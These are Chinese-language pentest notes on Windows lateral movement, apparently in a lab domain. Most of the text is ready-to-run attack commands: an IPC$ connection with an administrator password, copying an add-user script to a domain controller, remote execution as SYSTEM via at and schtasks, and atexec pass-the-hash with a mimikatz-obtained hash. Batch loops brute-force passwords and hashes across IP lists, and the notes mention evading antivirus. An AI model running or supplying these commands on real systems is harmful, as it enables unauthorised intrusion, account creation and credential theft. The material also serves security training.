at命令

使用限制是當(dāng)前操作系統(tǒng)版本小于2012

先建立一個(gè)連接

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立 ipc 連接

復(fù)制添加用戶的批處理腳本到域控的C盤下

copy add.bat \\192.168.30.7\c$

at \\192.168.3.21 15:47 c:\add.bat #添加計(jì)劃任務(wù)

寫添加賬戶命令的時(shí)候要注意密碼規(guī)則

有可能會因?yàn)槊艽a不符合規(guī)則或者密碼太長導(dǎo)致命令執(zhí)行失敗

schtasks命令

適用于大于等于2012的操作系統(tǒng)

也是和at命令一樣建立ipc連接 然后上傳adduser的bat腳本到目標(biāo)機(jī)器C盤下

schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #創(chuàng)建 adduser 任務(wù)

對應(yīng)執(zhí)行文件

如果一直沒有響應(yīng)可能是IP錯(cuò)了

schtasks /run /s 192.168.3.32 /tn adduser /i #運(yùn)行 adduser 任務(wù)

schtasks /delete /s 192.168.3.21 /tn adduser /f? ? ? #刪除 adduser 任務(wù)

atexec 第三方工具

缺點(diǎn)：如果目標(biāo)機(jī)器有安全狗或者其他的waf容易被查殺報(bào)警? 需要做免殺? 沒有Windows自帶的工具好 有點(diǎn)就是功能多 有回顯

atexec.exe ./administrator:wsnd1593..WSND@192.168.30.7 "ipconfig"

也可以用hash連接

atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

hhash可以用mimikatz獲取

批量檢測明文或hash

這個(gè)應(yīng)該算是爆破了吧

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量檢測 IP 對應(yīng)明文

連接

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量檢測 IP 對應(yīng)明文

回顯版

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量檢測明文對應(yīng) IP

回顯版

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量檢測

HASH 對應(yīng) IP 回顯版

也可以用python寫爆破的腳本 然后打包成exe可以免py環(huán)境運(yùn)行